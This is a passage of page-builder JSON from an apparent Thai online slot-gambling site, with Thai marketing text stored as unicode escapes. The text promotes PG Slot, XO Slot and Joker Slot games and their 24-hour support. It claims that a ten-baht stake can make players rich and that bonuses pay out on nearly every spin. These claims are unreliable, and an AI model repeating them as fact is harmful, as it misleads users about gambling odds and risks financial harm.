\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 